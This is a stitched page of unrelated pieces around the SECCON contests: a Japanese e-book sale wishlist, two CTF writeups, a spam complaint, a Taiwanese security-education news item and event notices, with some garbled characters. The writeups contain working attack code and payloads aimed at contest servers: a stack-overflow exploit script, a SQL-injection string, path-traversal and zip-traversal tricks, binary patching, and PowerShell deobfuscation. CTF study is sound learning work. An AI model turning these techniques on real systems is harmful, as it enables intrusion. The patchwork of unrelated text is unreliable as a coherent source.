達人出版会セール

達人出版会ので半額しまくり超セールやってたので、ぜんぶみていい感じのやつのリスト作った　しかし買った本は・・・読まなければいけないッ・・・

https://tatsu-zine.com/books/

=======================================

【半額】 相関係数 

  https://tatsu-zine.com/books/correlation-coefficient

相関係数の辞典みたいなかんじか？面白そう

【半額】 RustではじめるOpenGL

https://tatsu-zine.com/books/rust-opengl

うーん、WebGLに興味があるのでまずはこっちを読んでみるのもいいかも？

プログラミング英語教本

https://tatsu-zine.com/books/programming-english-textbook

コメントとかコミットの書き方とかいつも迷う・・・

【半額】 万能コンピュータ　ライプニッツからチューリングへの道すじ

https://tatsu-zine.com/books/universal-computer

こういう本すき、他の６人はもちろん知ってるけどカントルって聞いたことない名前だ

【半額】コンピュータ理論の起源［第1巻］チューリング

https://tatsu-zine.com/books/origin-computer-theory1

これいいな～！　 第1巻しかないのか・・・　解説ついてるのうれしい　ググったらすぐ出てくるけど訳だけじゃなくて原文も載せておいてほしかった　これ紙でほしいかもしれないけど買ってから欲しかったら考えよう

ユニケージ原論

https://tatsu-zine.com/books/unicage-genron

宗教

【半額】 実践・自然言語処理シリーズ 第6巻　クチコミ分析システムの作り方

https://tatsu-zine.com/books/anlp-kuchikomi

仕事と近いような近くないような、読みたいような読みたくないような・・・

ソフトウェア・テスト���技法　第2版

https://tatsu-zine.com/books/the-art-of-software-testing

紙版2006年か・・・　ちょっと古いかな

【半額】 株とPython─自作プログラムでお金儲けを目指す本

https://tatsu-zine.com/books/stock-and-python

株が趣味の親戚がいるけどいまいち話についていけないのでこれで勉強するのもおもろいかもしれない

【半額】 グラフ理論入門(原書第4版)

https://tatsu-zine.com/books/introduction-to-graph-theory-4ed

原著2018年でよさそう。三回生のときマジで金がなくて教科書買わなかったからグラフ理論の本、一冊も持ってないんだよな・・・

仕様書の読み方と書き方

https://tatsu-zine.com/books/reading-writing-specification

いつも適当に書いてるから一度くらいは本を読んでも良いのかな・・・　147ページだったらそんなに厚くないと思うし

【半額】Hugoで始める静的サイト構築入門　静的サイトジェネレーターで作る自作サイト

https://tatsu-zine.com/books/hugo-ssg

TumblerやめてHugoもいいかなあとおもってたし、2021年の本だしよさそう

【半額】 容量市場の真実　第1回入札の失敗を詳細分析

https://tatsu-zine.com/books/youryou-shijou

容量市場ってはじめて聞く単語だ

ガベージコレクションのアルゴリズムと実装

https://tatsu-zine.com/books/gcbook

安いし良さそうなんだけど翔泳社のやつもまだ読めてないんだよな

【半額】 Rust+ECSでゲーム開発 -ゲームエンジンAmethystのススメ-

https://tatsu-zine.com/books/rust-ecs-amethyst

Amethyst、rust game-devグループのやつなので何回もみたことあるけど使ったことはない。bevy-engineとかと比べてちょっとごついなと思ってハードルあったから本読んでみるとおもしろそう

【半額】 Chiselを始めたい人に読んで欲しい本

https://tatsu-zine.com/books/begging-chisel

ずっとChisel使ってみたいと思ってたけどまとまった情報みたことなかったから本があったの初めて知ってうれしかった、気になる

【半額】 グラフ・ネットワークアルゴリズムの基礎 ―数理とCプログラム

https://tatsu-zine.com/books/graph-network-algorithms-no-kiso

こっちよりは上に書いてあるやつのほうがいいかな。定番のやつがいいなあ　あとやっぱりど定番のやつは紙でほしい

セキュリティコンテストチャレンジブック

https://tatsu-zine.com/books/seccon-challengebook

詳解セキュリティコンテスト

https://tatsu-zine.com/books/ctfbook

【半額】 解題pwnable セキュリティコンテストに挑戦しよう！

https://tatsu-zine.com/books/pwnable

CTFやったことない。やってみたい！　でも入門書はなんか定番がある気がする

Kaggle Grandmasterに学ぶ 機械学習 実践アプローチ

https://tatsu-zine.com/books/kaggle-grandmaster-ml

Kaggleコンペティション チャレンジブック

https://tatsu-zine.com/books/kaggle-ml

最近Kaggle大炎上してて愉快だし、久しぶりにちょっとやってみてもいいのかもしれん

【半額】 世界標準MIT教科書　ストラング：線形代数イントロダクション　原書第4版

https://tatsu-zine.com/books/introduction-to-linear-algebra-4ed

これは評判よくて、訳もだめだってレビューあったけどそこまではひどく無い気がする・・・？

【半額】 世界標準MIT教科書｜ストラング：線形代数とデータサイエンス

https://tatsu-zine.com/books/linear-algebra-and-data-science

これは訳の評判がひどいんだよな

【半額】 世界標準MIT教科書｜ストラング：微分方程式と線形代数

https://tatsu-zine.com/books/differential-equations-and-linear-algebra

これも訳の評判がひどいんだよな

【半額】 世界標準MIT教科書 Python言語によるプログラミングイントロダクション第2版 データサイエンスとアプリケーション

https://tatsu-zine.com/books/python-programming-introduction-2ed

【半額】 世界標準MIT教科書　Python言語によるプログラミング イントロダクション

【半額】 セジウィック:アルゴリズムC 第1~4部：―基礎・データ構造・整列・探索―

https://tatsu-zine.com/books/algorithm-c-1-4

https://tatsu-zine.com/books/python-programming-introduction

お買い得だけどあんまり興味ないな

【半額】 カードゲーム制作を支える技術

https://tatsu-zine.com/books/cardgame-development

これちょっとおもしろそうで気になっちゃうな

Favorite tweets: ～幅広い業界から注目を集める日本最大のCTFコンテスト～セキュリティコンテスト「SECCON CTF」12月11日(土)-12日(日)開催 https://t.co/z9gkIwXH8y 賞金総額100万もあるけど、Capture The Packetあるじゃん！！ — ほよたか (@takahoyo) Nov 19, 2021

http://twitter.com/takahoyo

SECCON Beginners CTF 2020の監視・オペレーションを支える技術 - ポン酢ブログ(β) [はてなブックマーク]

SECCON Beginners CTF 2020の監視・オペレーションを支える技術 - ポン酢ブログ(β)

LifeMemoryTeamの@atponsです。今回のSECCON Beginners CTF 2020はお楽しみいただけたでしょうか。���分は運営やインフラ整備をしておりました。 今回は、自分が担当していた監視、オペレーション部分の構築回りについて書いておきます。 死活監視 ��ッジ 今回参加者のみなさんには、このようなバッジを問題に付与して提...

from kjw_junichiのはてなブックマーク https://ift.tt/2ZuZ1y6

SECCON Beginners CTF 2020 writeup

writeupというのが何なのかよくわかってないですが、それっぽいのを書いてみます。CTF歴は2018年のctf4b以来2回目です。

Welcome

Discordに貼られたFlagを入れるだけ。

Spy

リストにある名前を適当に入れてみると、一瞬でレスポンスが返る時もあれば1秒ぐらいかかる時もある。 1秒かかるやつ(たぶん暗号化とかで時間かかってそう)をあつめてチェックいれればよし。

R&B

頭にRがついてたらROT13の逆、頭にBがついてたらBase64のDecodeをすればよし。Python久々に書く上にPython3は初だったのでbytesとstrの型変換でとまどった。

import base64 flag = b'BQlVrOUllRGxXY2xGNVJuQjRkVFZ5U0VVMGNVZEpiRVpTZVZadmQwOWhTVEIxTkhKTFNWSkdWRUZIUlRGWFUwRklUVlpJTVhGc1NFaDFaVVY1Ukd0Rk1qbDFSM3BuVjFwNGVXVkdWWEZYU0RCTldFZ3dRVmR5VVZOTGNGSjFTMjR6VjBWSE1rMVRXak5KV1hCTGVYZEplR3BzY0VsamJFaGhlV0pGUjFOUFNEQk5Wa1pIVFZaYVVqRm9TbUZqWVhKU2NVaElNM0ZTY25kSU1VWlJUMkZJVWsxV1NESjFhVnBVY0d0R1NIVXhUVEJ4TmsweFYyeEdNVUUxUlRCNVIwa3djVmRNYlVGclJUQXhURVZIVGpWR1ZVOVpja2x4UVZwVVFURkZVblZYYmxOaWFrRktTVlJJWVhsTFJFbFhRVUY0UlZkSk1YRlRiMGcwTlE9PQ==' def b64decode(s): return base64.b64decode(s) def rrot13(s): def f(x): ch = x if ord('a') <= ch and ch <= ord('z'): ch = ch - 13 if ch < ord('a'): ch += ord('z') - ord('a')+1 elif ord('A') <= ch and ch <= ord('Z'): ch = ch - 13 if ch < ord('A'): ch += ord('Z') - ord('A')+1 return ch return bytes([f(x) for x in s]) while True: print(flag, flag[0]) if flag[0] == ord(b'B'): flag = b64decode(flag[1:]) elif flag[0] == ord(b'R'): flag = rrot13(flag[1:]) else: print("unkwno") exit()

mask

Ghidraで逆アセンブルしたところ、2つのビットマスクに対してFLAGを1文字ずつANDをとって、結果がそれぞれ期待した文字列になるかをチェックしていた。 2つのビットマスクの情報を合わせたら元のFLAGを復元できるので、復元する。

package main import ( "fmt" ) func main() { k1 := "atd4`qdedtUpetepqeUdaaeUeaqau" k2 := "c`b bk`kj`KbababcaKbacaKiacki" m1 := byte(0x75) m2 := byte(0xeb) for i := 0; i < len(k1); i++ { var b byte b = (k1[i] & m1) | (k2[i] & m2) fmt.Printf("%c", b) } }

Beginner's Stack

適当に埋めてったらRSP is misaligned!って言われた。 どうすればいいのかよくわからんかったけど、飛ばす先の関数アドレスを+1したら大丈夫だった(よくわからん…)。

from socket import * from struct import * from time import sleep from telnetlib import Telnet s = socket(AF_INET, SOCK_STREAM) s.connect(("bs.quals.beginners.seccon.jp", 9001)) s.send(b'\x00\x00\x00\x00\x00\x00\x00\x00'*5+b'\x62\x08\x40\x00\x00\x00\x00\x00\x00') t = Telnet() t.sock = s t.interact()

ググったところtelnetlibというのを使っている方がいたので真似した。 Pythonは標準ライブラリが豊富ですごいなあとおもいました。

readme

/からのパスであること、ctfという文字列を含まないことという制約がある。 最初エスケープシーケンスとかでがんばれば回避できるかと思って試したけどうまくいかなかった。 その後、/proc/self/cwd経由の相対パスならいけることがわかった。 カレントディレクトリは/proc/self/environのPWDから取れる。

emoemoencode

Flagのフォーマット的にctf{xxx}なので、最初の文字がcに相当するとしてシーザー復号すればよし。

s = "🍣🍴🍦🌴🍢🍻🍳🍴🍥🍧🍡🍮🌰🍧🍲🍡🍰🍨🍹🍟🍢🍹🍟🍥🍭🌰🌰🌰🌰🌰🌰🍪🍩🍽" ss = "" for c in s: d = ord(c)-127843+ord('c') print(ord(c), chr(d)) ss += chr(d) print(ss)

Tweetstore

'を\'とエンコードしているが、\'を入力すれば\\'になるのでシングルクオートを閉じることができる。 あとはコメントで後続のクエリを無視して、\' UNION select user, user, now() --をsearch wordに入れれば解ける。

unzip

https://github.com/ptoomey3/evilarc これでdirectory traversalなzipをつくったらいけた。

python evilarc.py flag.txt --depth 7 --os unix

sneaky

Ghidraで逆アセンブルしたところ、ソースが複雑でよくわからなかった。 適当にぽちぽち見てたらちょうどGAMEOVER出力してるっぽいところがあって、 その近辺で10000という定数と比較しているコードがあっ��。 10000がハイスコア閾値なんじゃ…と思い、バイナリエディタで実行ファイルを書き換えて0にしてみる。 10000(0x0f27)が出てくるところは4箇所あって、1個だけ書き換えるだとだめで、全部書き換えたところアイテムを1個取るだけでOKになった。

SECCON 2017 Online

12/9-10の24時間、SECCONオンライン予選がありました。海外勢も含め計1028チームが参加していたようです。結果は53位でした。国内チームのなかでは12位なので、2月に開催される国内決勝大会へ進めそうです。

putchar music - Programming 100

問題文はつぎのとおり。

This one line of C program works on Linux Desktop. What is this movie's title? Please answer the flag as SECCON{MOVIES_TITLE}, replace all alphabets with capital letters, and spaces with underscores.

main(t,i,j){unsigned char p[]="###>5|(int)(t*x));}}

与えられたソースをコンパイルします。include文を追加して、-lm オプションを付けてコンパイル。

#include #include

main(t,i,j){unsigned char p[]="###>5|(int)(t*x));}}

$ gcc a.c -lm

実行すると標準出力に大量のデータが流れてきます。これを再生すると映画の音楽が流れてきます。PCの環境によって音が鳴ったり鳴らなかったり？

$ a.out | aplay 再生中 raw データ 'stdin' : Unsigned 8 bit, レート 8000 Hz, モノラル

flagは SECCON{STAR_WARS}

SHA-1 is dead - Crypto 100

問題文はつぎのとおり。

SHA-1 is dead

http://sha1.pwn.seccon.jp/ Upload two files satisfy following conditions:

file1 != file2 SHA1(file1) == SHA1(file2) SHA256(file1) SHA256(file2) 2017KiB 2017KiB

1KiB = 1024 bytes

SHA1衝突が発生する2つのファイルを作成するようです。 SHA1といえば、ハッシュ衝突するファイルが実際に生成されたと話題になった件ですね。

https://shattered.io/

SHA1が衝突するファイルは既にあるので、あとはファイルサイズの条件を満たせばOK。 ハッシュ値計算の仕組みから、ハッシュ値が同じ2つのファイルに同じデータを追記した場合、追記後のファイルのハッシュは再び一致するはず。 上記サイトから衝突が発生した2つのPDFファイルをダウンロードします。

-rwxrwxrwx 1 root root 422435 12月 9 17:12 shattered-1.pdf -rwxrwxrwx 1 root root 422435 12月 9 17:12 shattered-2.pdf

2017KiBより大きく2018KiBより小さいファイルが欲しいのでサイズを計算する。

422435 bytes / 1024 = 412 KiB (shattered.ioのPDFファイルサイズ) 2017 KiB - 412 KiB = 1605 KiB (追記すべきデータのサイズ)

あとは適当なダミーデータをPDFに追記するだけ。

$ python -c "print '\xff'*1024*1605" > ff $ cat shattered-1.pdf ff > 1.pdf $ cat shattered-2.pdf ff > 2.pdf

$ ls -lrt 合計 6468 -rwxrwxrwx 1 root root 422435 12月 9 17:12 shattered-1.pdf -rwxrwxrwx 1 root root 422435 12月 9 17:12 shattered-2.pdf -rwxrwxrwx 1 root root 1643521 12月 9 17:24 ff -rwxrwxrwx 1 root root 2065956 12月 9 17:24 1.pdf -rwxrwxrwx 1 root root 2065956 12月 9 17:25 2.pdf

$ sha1sum 1.pdf 2.pdf 82a7ab1ec5d028f3956b6fe92c8ed594bfb41d92 1.pdf 82a7ab1ec5d028f3956b6fe92c8ed594bfb41d92 2.pdf

$ sha256sum 1.pdf 2.pdf f240399f72872cccc4e24fd91431bc604b5668cf7ba7e6a1ee35ad58edd43f40 1.pdf 89873267dd5f3da340e1304409aecfc1bcbd89e5428192834f6f1cc7a6902a11 2.pdf

SHA1が衝突する2つのファイルが得られました。これを問題サイトにサブミットして終了。 flagは SECCON{SHA-1_1995-2017?}

Powerful_Shell - Binary 300

問題文はつぎのとおり。

Crack me. powerful_shell.ps1-1fb3af91eafdbebf3b3efa3b84fcc10cfca21ab53db15c98797b500c739b0024

与えられたファイルはこんな感じ。Power Shellのスクリプトが難読化されている？

$ECCON=""; $ECCON+=[char](3783/291); $ECCON+=[char](6690/669); $ECCON+=[char](776-740); $ECCON+=[char](381-312); $ECCON+=[char](403-289); $ECCON+=[char](-301+415); $ECCON+=[char](143-32); $ECCON+=[char](93594/821); $ECCON+=[char](626-561); $ECCON+=[char](86427/873); $ECCON+=[char](112752/972); $ECCON+=[char](43680/416); $ECCON+=[char](95127/857);

(省略)

$ECCON+=[char](873-863); $ECCON+=[char](721-708); $ECCON+=[char](803-793); $ECCON+=[char](10426/802); Write-Progress -Activity "Extracting Script" -status "20040" -percentComplete 99; $ECCON+=[char](520-510); Write-Progress -Completed -Activity "Extracting Script";.([ScriptBlock]::Create($ECCON))

Windowsのデフォルトだとスクリプト実行がポリシーで制限されている。まずはスクリプトを実行可能にするために、PowerShellを管理者権限で起動して以下のコマンドを実行する。

PS C:\work> Set-ExecutionPolicy RemoteSigned

スクリプト実行するとSECCONの画像が表示されるが何かのチェックで終了している模様。

難読化されているといっても所詮はスクリプトなので最後のほうでeval的なことをしているのではと思う。 それらしいところを探して、デコードされて読みやすくなった状態のコード(があるはずと想定して)を出力してみる。

最後の行を変更してファイル出力

(変更前) Write-Progress -Completed -Activity "Extracting Script";.([ScriptBlock]::Create($ECCON))

(変更後) Write-Progress -Completed -Activity "Extracting Script";[ScriptBlock]::Create($ECCON)|Out-File -FilePath C:\work\output.ps1 -Encoding Ascii

再度実行すると、デコードされたスクリプトが得られる。ちなみにこのスクリプト、デバッガによる実行を検知すると終了するようになっている。

PS C:\work> .\powerful_shell.ps1

といってもまだ難読化されているのだが。 シンタックスエラーがあるので改行コードを若干修正すると実行できる。 また、処理中に実行環境のチェックをしているのでその部分をスキップして実行するとピアノの鍵盤が。実際に音もなるらしい？(自分の環境ではうまくならなかった)

処理の後半では、正しいキー入力(ピアノ演奏)を基に生成した鍵を使って、XORでデータ復号している。

(省略)

$text=@" YkwRUxVXQ05DQ1NOE1sVVU4TUxdTThBBFVdDTUwTURVTThMqFldDQUwdUxVRTBNEFVdAQUwRUxtT TBEzFVdDQU8RUxdTbEwTNxVVQUNOEFEVUUwdQBVXQ0NOE1EWUUwRQRtVQ0FME1EVUU8RThdVTUNM EVMVUUwRFxdVQUNCE1MXU2JOE0gWV0oxSk1KTEIoExdBSDBOE0MVO0NKTkAoERVDSTFKThNNFUwR FBVINUFJTkAqExtBSjFKTBEoF08RVRdKO0NKTldKMUwRQBc1QUo7SlNgTBNRFVdJSEZCSkJAKBEV QUgzSE8RQxdMHTMVSDVDSExCKxEVQ0o9SkwRQxVOE0IWSDVBSkJAKBEVQUgzThBXFTdDRExAKhMV Q0oxTxEzFzVNSkxVSjNOE0EWN0NITE4oExdBSjFMEUUXNUNTbEwTURVVSExCKxEVQ0o9SkwRQxVO EzEWSDVBSkJAKBEVQUgzThAxFTdDREwTURVKMUpOECoVThNPFUo3U0pOE0gWThNEFUITQBdDTBFK F08RQBdMHRQVQUwTSBVOEEIVThNPFUNOE0oXTBFDF0wRQRtDTBFKFU4TQxZOExYVTUwTSBVMEUEX TxFOF0NCE0oXTBNCFU4QQRVBTB1KFU4TThdMESsXQ04TRBVMEUMVThNXFk4TQRVNTBNIFUwRFBdP

(省略)

E0QVTUwTSBVMEUYXTxFAF0NCE0oXTBNCFU4QFhVBTB1KFU4TQBdMEUIXQ04TRBVMEUAVThNDFkFM EUobTBNDFUwRFBdAThNIFUITQRdME0wVQU8RShdMHUMVThMoF0wRNhdDThNEFUwRRhVOEzEWQUwR ShtME0EVTBFGF0BOE0gVQhNDF0wTVxVBTxFKF0wdQxVOEygXTBE2FxROE10VShZOTBFTF2E= "@

$plain=@() $byteString = [System.Convert]::FromBase64String($text) $xordData = $(for ($i = 0; $i -lt $byteString.length; ) { for ($j = 0; $j -lt $f.length; $j++) { $plain+=$byteString[$i] -bxor $f[$j] $i++ if ($i -ge $byteString.Length) { $j = $f.length } } }) iex([System.Text.Encoding]::ASCII.GetString($plain))

キーストローク入力を照合しているコード部分を読んで鍵を特定する。

$f="hhjhhjhjkjhjhf"

さらに、復号後のデータをファイル出力するようにスクリプトを修正して実行。

(変更前) iex([System.Text.Encoding]::ASCII.GetString($plain))

(変更後) [System.Text.Encoding]::ASCII.GetString($plain)|Out-File -FilePath C:\work\output3.ps1 -Encoding Ascii

そうして得られた復号後のスクリプトはまだ難読化されてる。。。変数名が記号になっているのでややこしい。

${;}=+$();${=}=${;};${+}=++${;};${@}=++${;};${.}=++${;};${[}=++${;}; ${]}=++${;};${(}=++${;};${)}=++${;};${&}=++${;};${|}=++${;}; ${"}="["+"$(@{})"[${)}]+"$(@{})"["${}${|}"]"$(@{})"["${@}\({}"]+"\)?"[${+}]+"]"; ${;}"".("$(@{})"["${}${[}"]"$(@{})"["${}${(}"]"$(@{})"[${}]+"$(@{})"[${[}]+"$?"[${+}]+"$(@{})"[${.}]); ${;}"$(@{})"["${}${[}"]"$(@{})"[${[}]+"${;}"["${@}${)}"];"${"}${.}${(}+${"}${ (省略)

また最後の行に着目して、デコード後のスクリプトを出力する。

(変更前) ${;}="$(@{})"["${}${[}"]"$(@{})"[${[}]+"${;}"["${@}${)}"];"${"}${.}${(}+${"}${ (省略)

(変更後) ${;}="$(@{})"["${}${[}"]"$(@{})"[${[}]+"${;}"["${@}${)}"]; Write-Host "${"}${.}${(}+\({"}\)

出力結果はこちら。またまた難読化されてる。

[CHar]36+[CHar]69+[CHar]67+[CHar]67+[CHar]79+[CHar]78+[CHar]61+[CHar]82+[CHar]101+[CHar]97+[CHar]100+[CHar]45+[CHar]72+[CHar]111+[CHar]115+[CHar]116+[CHar]32+[CHar]45+[CHar]80+[CHar]114+[CHar]111+[CHar]109+[CHar]112+[CHar]116+[CHar]32+[CHar]39+[CHar]69+[CHar]110+[CHar]116+[CHar]101+[CHar]114+[CHar]32+[CHar]116+[CHar]104+[CHar]101+[CHar]32+[CHar]112+[CHar]97+[CHar]115+[CHar]115+[CHar]119+[CHar]111+[CHar]114+[CHar]100+[CHar]39+[CHar]13+[CHar]10+[CHar]73+[CHar]102+[CHar]40+[CHar]36+[CHar]69+[CHar]67+[CHar]67+[CHar]79+[CHar]78+[CHar]32+[CHar]45+[CHar]101+[CHar]113+[CHar]32+[CHar]39+[CHar]80+[CHar]48+[CHar]119+[CHar]69+[CHar]114+[CHar]36+[CHar]72+[CHar]51+[CHar]49+[CHar]49+[CHar]39+[CHar]41+[CHar]123+[CHar]13+[CHar]10+[CHar]9+[CHar]87+[CHar]114+[CHar]105+[CHar]116+[CHar]101+[CHar]45+[CHar]72+[CHar]111+[CHar]115+[CHar]116+[CHar]32+[CHar]39+[CHar]71+[CHar]111+[CHar]111+[CHar]100+[CHar]32+[CHar]74+[CHar]111+[CHar]98+[CHar]33+[CHar]39+[CHar]59+[CHar]13+[CHar]10+[CHar]9+[CHar]87+[CHar]114+[CHar]105+[CHar]116+[CHar]101+[CHar]45+[CHar]72+[CHar]111+[CHar]115+[CHar]116+[CHar]32+[CHar]34+[CHar]83+[CHar]69+[CHar]67+[CHar]67+[CHar]79+[CHar]78+[CHar]123+[CHar]36+[CHar]69+[CHar]67+[CHar]67+[CHar]79+[CHar]78+[CHar]125+[CHar]34+[CHar]13+[CHar]10+[CHar]125|iex

再度、最後の箇所で難読化解除後のスクリプトを出力するよう変更。

実行して得られた結果がこちら。ようやくゴール！

$ECCON=Read-Host -Prompt 'Enter the password' If($ECCON -eq 'P0wEr$H311'){ Write-Host 'Good Job!'; Write-Host "SECCON{$ECCON}" }

flagは SECCON{P0wEr$H311}

Ps and Qs - Crypto 200

問題文はつぎのとおり。

Decrypt it. psqs1-0dd2921c9fbdb738e51639801f64164dd144d0771011a1dc3d55da6fbcb0fa02.zip (pass:seccon2017)

与えられたZipファイルの中身は暗号文と公開鍵2つです。

Archive: psqs1-0dd2921c9fbdb738e51639801f64164dd144d0771011a1dc3d55da6fbcb0fa02.zip Length Date Time Name –—— -— -— ---- 512 12-09-17 01:33 cipher 800 12-09-17 01:33 pub1.pub 800 12-09-17 01:33 pub2.pub

$ openssl rsa -in pub1.pub -text -pubin Public-Key: (4096 bit) Modulus: 00:cf:cf:bb:ee:a7:df:14:3a:8a:c2:08:b1:aa:1d: 2f:86:54:5a:c4:cb:58:8c:94:a3:fb:1c:14:ad:91: a4:f0:b9:36:15:7c:5a:4b:86:9c:18:a8:b8:64:f4: (省略)

$ openssl rsa -in pub2.pub -text -pubin Public-Key: (4096 bit) Modulus: 00:bb:33:cc:7f:cc:8e:ca:f3:bf:9e:d9:5c:58:37: 92:e1:ec:6b:80:ee:87:5e:c2:06:4d:bc:f0:75:95: c8:34:49:23:bf:53:65:24:d4:e0:a7:55:74:c7:79: (省略)

暗号文ひとつに対してわざわざ公開鍵ふたつを渡しているのが気になります。と思いつつ調べているとこんなのを見つけてしまいました。

https://github.com/Ganapati/RsaCtfTool

RsaCtfTool RSA tool for ctf - uncipher data from weak public key and try to recover private key Automatic selection of best attack for the given public key

一瞬で終了、ラッキー。

$ ~/RsaCtfTool/RsaCtfTool.py –publickey "*.pub" –private > private $ openssl rsautl -decrypt -inkey private -in cipher -out plain.txt $ cat plain.txt SECCON{1234567890ABCDEF}

flagは SECCON{1234567890ABCDEF}

JPEG file - Binary 100

問題文はつぎのとおり。

Read this JPEG is broken. It will be fixed if you change somewhere by 1 bit.

ファイルが壊れていると言っているので、修復すればflagが表示されるということでしょう。

JPEG修復してくれるというツールを適当に探してきて実行しただけ。怪しげなツールだと困るので、ツール実行前にスナップショットをとっておいて後で戻しておきました。こういう時に仮想マシンは便利です。

とても楽しかったです。SECCONは毎年楽しみにしていて欠かさず参加するようにしている重要イベントです。予選突破できたのもうれしい。 運営のみなさん、チームのみなさん、まわりのいろいろな人に感謝です。ありがとうございました。

迷惑メールを撲滅してほしい

迷惑メールが毎日200通以上きている。

最近は、Amazonや楽天を名乗る詐欺メールが多い。

  SECCONとは、セキュリティのコンテストである。

ホームページhttps://www.seccon.jp/2020/seccon/about.htmlによると

「「

SECCONとは 情報セキュリティをテーマに多様な競技を開催する情報セキュリティコンテストイベントです。実践的情報セキュリティ人材の発掘・ 育成、技術の実践の場の提供を目的として設立されました。

「SECCON」 ではカンファレンスやワークショップなどのほかに、攻撃・防御両者の視点を含むセキュリティの総合力を試すハッキングコンテスト「CTF (Capture the Flag)」や、あるテーマにあわせてプログラムを作成して披露するプログラミングコンテスト「ハッカソン」などがあります。

」」

とのことであり、そのなかにハッキ…

View On WordPress

臺灣好厲駭  遇見資安新秀崛起

在教育部資訊安全人才培育計畫的推動與經費支持下，來自全國各地對資訊安全具備高度學習興趣的大學生及高中職學生，從104年開始，透過跨校的大學師資及來自企業的業師共同指導培育，成效顯著。學生的表現不但深受企業讚賞，在國際大賽的表現也可圈可點。不但在日本2017 SECCON CTF  for Girls資安競賽獲得第2名優異成績，由跨校學生組成的BFS戰隊 更在今年「全球駭客攻防大賽 (DEFCON CTF)」僅有的25個決賽席次中，取得決賽權，這是我國歷年來首次取得決賽權的第2支戰隊，成為我國頂尖的資安新血。

這些表現優異的資安尖兵幕後推手之一，是由國立臺灣科技大學、國立臺灣大學、國立交通大學及崑山科技大學等校的教師們共同策劃推動的新型態資安暑期課程(AIS3 )及「臺灣好厲駭」計畫。前者邀集了國內外具資安實務經驗的專家及資安大賽常勝選手或教練擔任講師，在每年暑期進行為期1周的密集研習課程的培訓；後者則進一步針對具潛力且主動學習動機高的學生們，由大學的教師，結合國內熱心投入的資安企業專家，共同擔任導師(mentor)，給予每屆學生為期1年的培育指導。

AIS3及臺灣好厲駭計畫適性培育學生兼具理論與實務技能，不但有學員協助行政院在網路攻防實兵演練擔任資安尖兵，部分學員更獲業界導師肯定，得到業界實習機會，學生對這些培育也深覺受益良多。如連續兩年獲選參加「臺灣好厲駭」培育、即將在今年畢業將成為奧義智慧科技正式員工的羅煜賢同學即表示，「臺灣好厲駭計畫中的導師媒合，不只侷限在自己所媒合的導師，只要學員有興趣的領域如：鑑識調查、網站安全、人工智慧等，都可向該領域專長的業師請教，這是計畫的最大特點；除外，有幸至媒合導師的企業(奧義智慧)實習，實習期間進行各式不同性質的專案，快速吸收頂尖企業所需要了解的技術與知識，也可深入了解臺灣當下的資安產業狀況，而這些專案的實戰經驗及產業狀況經驗都是無法從學校課程中所獲得的，臺灣好厲駭已成功成為學生與企業之間的橋樑，很榮幸在第1屆及第2屆參與導師的培訓，獲得不只是技術，更是產業經驗」。

接軌產學及國際一直是教育部、學校及企業持續努力的方向，第2屆「臺灣好厲駭培訓成果發表暨產業鏈結交流會」即將在8月24日(星期五)在國立臺灣科技大學舉行，學員除將發表1年來的學習成果外，會中並邀請富邦金控李相臣副總經理主講「金融產業資安現況與資安人才需求」及104資訊科技公司資訊服務總處陳啟昌資安長分享「資安產業現況與資安人才需求」，教育部歡迎對資安人才有需求的企業、或對資安領域有興趣的學生蒞臨參加。（活動詳細資訊請至資訊安全人才培育計畫網站：https://isip.moe.edu.tw/，報名網址：https://tinyurl.com/y76zoapp）

備註： 1. 資安搶旗競賽（Capture The Flag, CTF）：利用電腦科學技術（如系統安全、演算法、密碼學、逆向工程及程式設計等理論）來模擬真實世界資安攻防縮影，透過團隊合作方式，運用攻擊及防守等技能，達到入侵對手電腦系統，取得伺服器中的金鑰或旗幟。解題是常見的比賽模式之一，這類競賽常用於培訓高階資安人才。 2. 新型態資安暑期課程（Advanced Information Security Summer School, AIS3）活動官網http://ais3.org

「SECCON 2016」1月27～29日開催、セキュリティコンテスト決勝大会

#東京都足立区千住河原町２９ 2017年01月20日 03:06:00 コンピューターセキュリティ技術を競う日本最大規模のCTF（Capture The Flag）大会「SECCON 2016」の決勝大会が1月27～29日に東京電機大学東京千住キャンパス（東京都足立区）で開催される。現在、公式サイトで来場登録を受け付けている。 SECCON 2016の各予選や ... 東京都足立区千住河原町２９の近所のバー